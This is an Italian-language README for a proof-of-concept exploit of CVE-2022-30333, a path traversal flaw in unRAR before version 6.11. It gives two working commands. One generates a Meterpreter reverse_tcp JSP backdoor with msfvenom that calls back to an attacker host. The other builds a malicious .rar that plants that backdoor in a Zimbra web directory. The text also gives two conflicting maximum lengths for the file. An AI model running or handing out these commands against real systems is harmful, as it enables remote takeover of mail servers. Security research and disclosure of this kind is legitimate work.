
Exploit proof-of-concept per il path traversal CVE-2022-30333 in unRAR, che genera file .rar malevoli per estrarre payload arbitrari in posizioni specificate dall'attaccante.
Una prova di concetto per CVE-2022-30333 - una vulnerabilità di path traversal in unRAR versioni precedenti alla 6.11. L'ho creata come dimostrazione dell'exploit per un articolo su AttackerKB, e spero di incorporarla presto in un modulo Metasploit!
In pratica, si fornisce un target (incluso il path traversal) e alcuni dati del file, e questo strumento genererà un .rar che estrae quel file in quella posizione. La lunghezza massima del file è di 104 byte, e la lunghezza massima del file è di 4096 byte. (Questo non è intrinseco alla vulnerabilità, è solo ciò che ho scelto quando ho generato il file).
Ad esempio, genera una backdoor con msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Quindi crea un file .rar, piantando il .jsp in un posto divertente:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar